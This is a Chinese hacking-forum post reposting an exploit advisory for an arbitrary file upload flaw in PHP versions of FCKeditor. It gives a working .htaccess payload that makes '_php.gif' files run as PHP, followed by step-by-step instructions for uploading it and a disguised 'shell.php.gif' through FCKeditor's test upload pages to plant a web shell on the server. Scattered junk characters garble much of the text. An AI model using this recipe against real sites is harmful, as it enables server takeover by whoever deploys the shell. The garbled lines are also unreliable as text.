找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2262|回复: 0
打印 上一主题 下一主题

FCKeditor所有php版本Upload上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-10-27 17:25:21 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
FCKeditor所有php版本Upload上传漏洞( t7 q$ ^8 F* c: [- Z
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:071 ?3 X1 b6 k0 g5 R) H2 M
减小字体 增大字体: _: g% Q7 S: D  H* ^0 J8 O
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability! _) T. p3 p" B! t
[+] Date: 2011& y" o2 b7 |6 a" k6 r/ y
[+] Author : sinesafe.cn: f3 D4 S# M: ]" N) }
[+] Website : WwW.sinesafe.cn
: s/ P! l8 v; v( y' ]9 H———————————————————
3 C6 g; ]- f8 i( a% E1.create a htaccess file:# ^3 I" m* X+ k6 M
code:# _* g. v+ y/ _$ u, E5 v
<FilesMatch “_php.gif”>
1 |) x3 x2 @& p! e8 Q5 i2 jSetHandler application/x-httpd-php
5 Z: ~" w# c3 c; d0 k4 x5 v</FilesMatch>5 q/ l- J, }  @( @  f/ a- N

3 N1 S8 n3 r) m2 x+ }% H7 ?  H! d2.Now upload this htaccess with FCKeditor." q2 [, B- q/ R1 M  P1 A  x, h$ `
+ p. P6 v) S4 }2 D3 w
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
$ R7 ]1 P. c4 D
0 f. c& q# L3 N7 b: ~http://www.sinesafe.cn/FCKeditor ... onnectors/test.html- A3 t: \  i, b% K
) m1 H" P! N  t, @- f* f
———————————————————————————————-& \3 _* I5 @4 D9 s
3.Now upload shell.php.gif with FCKeditor.  ^9 t' _0 ^5 e4 a0 h+ x& B- r1 t! [% u
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.5 Z0 w* X! Q( E: R+ Y
5.http://www.sinesafe.cn/anything/shell_php.gif* M1 l- b$ {5 Q
6.Now shell is available from server.

7 A1 ?: }, w8 S* H  u/ Z" {3 G. P  C4 C0 S. e6 W

0 R& e1 N; O2 Z3 u1 R1 G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表